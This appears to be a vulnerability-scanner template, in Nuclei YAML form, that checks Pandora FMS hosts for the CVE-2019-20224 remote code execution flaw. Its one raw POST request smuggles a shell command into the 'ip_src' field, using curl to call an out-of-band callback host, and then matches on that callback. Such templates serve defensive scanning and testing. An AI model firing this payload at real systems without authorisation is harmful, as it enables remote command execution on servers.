34 lines
944 B
YAML
34 lines
944 B
YAML
|
id: CVE-2019-20224
|
||
|
|
||
|
info:
|
||
|
name: Pandorafms RCE
|
||
|
author: ritikchaddha
|
||
|
severity: critical
|
||
|
reference:
|
||
|
- https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
|
||
|
tags: pandorafms,rce,cve,cve2019
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
|
||
|
|
||
|
redirects: true
|
||
|
max-redirects: 2
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: word
|
||
|
part: interactsh_protocol
|
||
|
name: http
|
||
|
words:
|
||
|
- "http"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|